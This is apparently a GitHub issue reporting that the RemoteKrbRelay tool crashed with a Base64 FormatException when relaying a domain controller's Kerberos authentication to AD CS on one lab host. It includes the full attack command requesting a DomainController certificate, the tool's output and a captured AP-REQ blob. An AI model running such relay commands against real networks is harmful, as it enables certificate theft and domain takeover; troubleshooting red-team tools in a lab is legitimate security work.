You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I encountered this error when trying to relay the machine and DC as a single host.
dc:WIN-GV6N82TLJBR.redteam.com
adcs:WIN-GV6N82TLJBR.redteam.com RemoteKrbRelay.exe -adcs -template DomainController -victim WIN-GV6N82TLJBR.redteam.com -target WIN-GV6N82TLJBR.redteam.com -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
/\_/\____,
,___/\_/\ \ ~ /
\ ~ \ ) XXX
XXX / /\_/\___,
\o-o/-o-o/ ~ /
) / \ XXX
_| / \ \_/
,-/ _ \_/ \
/ ( /____,__| )
( |_ ( ) \) _|
_/ _) \ \__/ (_
(,-(,(,(,/ \,),),)
CICADA8 Research Team
From Michael Zhmaylo (MzHmO)
[+] Setting UP Rogue COM at port 12345
[+] Registering...
[+] Register success
[+] Forcing Authentication
[+] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 6082070c06092a864886f71201020201006e8206fb308206f7a003020105a10302010ea20703050020000000a38205186182051430820510a003020105a10d1b0b5245445445414d2e434f4da22e302ca003020102a12530231b04687474701b1b57494e2d4756364e3832544c4a42522e7265647465616d2e636f6da38204c8308204c4a003020112a103020108a28204b6048204b22ba21000f33c9820e402bf79086eb8ccda63c533785a91c330707ebb58ee104e2be4091f99f7adada055df45af69525ef7ba04ef66906a28dc486bc9cc3b6f8c0e5525a2eb029bf577080108a692014d3f08e34407663192fe1c3af212b9e57178bc5083822f77d13d62f35618468c3f42cd18bc3bf80c272ef5a52ce77015de3bda177a600913dd96f6a8ec72f2b31d9d73e8432d93957cb6000131c1f09730008373f018c420ece68d036244e5877078994858d6fc95f1961b1541cb09a11e45fe794a004010fe1515ffeb412228165bc9841a0f1b7d313a8a5731f80440add01439af6ee4874cb5cefa74e17eb611912c9fd7a7476aa83dc7a2b0a6446e692844368b25d2804921fd440718e3124da055dbde74ab9adfec77f62349b5ad1d506e6e0316022577204ba9c7a48c0ebe77d2acecfe89505eb990c52dab9fb741654dc54a8d385acc27707ce837f1791fb99f9bd312c92a785e8cd15ece1e2dd363d8c405e1434d24a1fbc88b09661e3d18a8a3a74c74afcbc65953e9c8a3a4dd71e729d678ba0b7bf34ec6452428a57ad98a091898d751dac42744f14bda4629bcb9d8ed7dbe42ea09b1f43262bbe7ae55754149a81188e655fdcdfd1eade57e5362e33edc257e38d94f5020008ec0306e440d82eb48e168a7b495bd5e72795e6e125bd4ff0a24b261e49073ca3b12500bf8bd17874f6b7e93aab9a575084a08f6e95710df314884404e588302c8992bb9f90bd2cc843faa9d685cc87bcd9f9d5f2e07b65214c53ad381b3afb54599e716433c764f9ac0a14cb38a2fb33d0040a69dab01d612dda30d5e31ef4c82d43ee5ca9a45a71b6da6e67ce95843fc7b62e6520ca2fe428b052b56e29590131bb88ec3ade6c88194bc6b0ab8255f7c190817037e60d0339b19201715bc9f753456433b88eb8878bf814755e0cf9fff6db3015ac49c8cff7570e150d37f3a7c9d8942ab82dea6af1411413c433f2889acfba4dc0dfe5366591b058c963a2fe1efa39096c425c42f3701388ce488cb674b064746b5a5e18311b3bfc8014f0df6a47359a7fcdaf027fd34a130b05d26947a3500d0721f04cea1f4de60604bc369d6c39f2a9e633826b593d555c27a79e2e344d0ca62f742efaa64f7631857a37fec88d3a3ece8c8e2e68beec6ab06ca2706f7b029dc0e1be23c5754ca72fc555bf72a0c3d1eac05826155f6af455d016ef358276aa68907f550dd8ff25b81e5d091fb2152ffea652ec39d2829d9d2bda9acf63f123a8e2a5ee2fff39a6fa29323dc4caaf51dbec5e255dd0223ed8f147c91106d028011f3bb077b4cf4b143835091a0119db8e2f4e25159425639b3b6d1323ca488b634f83d1a58b13983bbcb4fb94caa51b0bba768cb381c4a509a0588b61937865f83c6fad2af90ca6462d1f2324766f647026462b498130d2803fa9437738b5b128e770e3790bed5017a9fea6ab94b7765ad0115415c8d3f3af3d9ef34eceb4ec3456b02d4db3e4b9750417102ac3f65418c5829c44fbda1ad44db869312d6093d593c24edae8f2c993dfabde6e0be301edf317f240dcd70fb77ad0abb9c1452c1b18412d8df9cc4513d1189c6d97e9880f01cb3d3bcfcc511cd812395f5780ac82adef9e11dfab037885878773c395a94b1f830c1003a4320b95e18f808781a5ba82fe405d4ea10ed880a3866aca703a48201c4308201c0a003020112a28201b7048201b3a2c2be2675486759b449b19dd710c358cd9319670bdea73150dc6e0ae2d3c25b4ac746370fbd7d1695ef9098f2daaf0d51eda41726cea122657819283338f9938cf303f98402ab9220b6ba256240c865acae41b23b7dbd23be749802fcc2b8bd85a6c50efa61ccae1603fc9ff1983c83bea5c74edf1c7d233630a93b7cb86c0a08b7502cf1d95c381c4d2047503d2f192c90e8d7f65d280f9214fc1a7c60c1e1ba72f3c4c5819fc94316bb7d53792ca0a52b456bf3fcabe7ca99a90c245eeee4c89f41f2ebdf32091118317e43c27ba0d1a9e3793cd3b6beef291f1b5ff22972d2d5cc85650112e6159d6563bd89a0e0c3ef119791a79c36a23b52a24760c7aab90fd54ba74f32880504a9e89f28ea0a607d1a84b873caa001ec9c3938f2bdeab1f517ccaf13e91acafd0183a1a476b6c1775e82838eb4a1ca768c72beba239d6a494c02ef566b1966b669646d078d965c1ad88eda696c88346cb52b7c07dca3c8823e0b759c0e856daa34b620bd5ee54ca808b2fd27faa5478354937c0ec6efe6550520608696d826241d5d1f5b62a3c41f4f9dcc99d5e04c92ba6e1f50768cd27df98d53a6a510bdbe09c9fa5bb440297e87
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
"Unhandled exception: System.FormatException: The input is not a valid Base-64 string because it contains non-Base-64 characters, more than one padding character, or the padding characters are not at the end of the string."
在 System.Convert.FromBase64_Decode(Char* startInputPtr, Int32 inputLength, Byte* startDestPtr, Int32 destLength)
在 System.Convert.FromBase64CharPtr(Char* inputPtr, Int32 inputLength)
在 System.Convert.FromBase64String(String s)
在 RemoteKrbRelay.Relay.Http.Relay()
在 RemoteKrbRelay.Relay.Relay.AcceptSecurityContext_(SecHandle phCredential, SecHandle phContext, SecurityBufferDescriptor pInput, AcceptContextReqFlags fContextReq, SecDataRep TargetDataRep, SecHandle phNewContext, IntPtr pOutput, AcceptContextRetFlags& pfContextAttr, SECURITY_INTEGER ptsExpiry)
The text was updated successfully, but these errors were encountered:
I encountered this error when trying to relay the machine and DC as a single host.
dc:WIN-GV6N82TLJBR.redteam.com
adcs:WIN-GV6N82TLJBR.redteam.com
RemoteKrbRelay.exe -adcs -template DomainController -victim WIN-GV6N82TLJBR.redteam.com -target WIN-GV6N82TLJBR.redteam.com -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3The text was updated successfully, but these errors were encountered: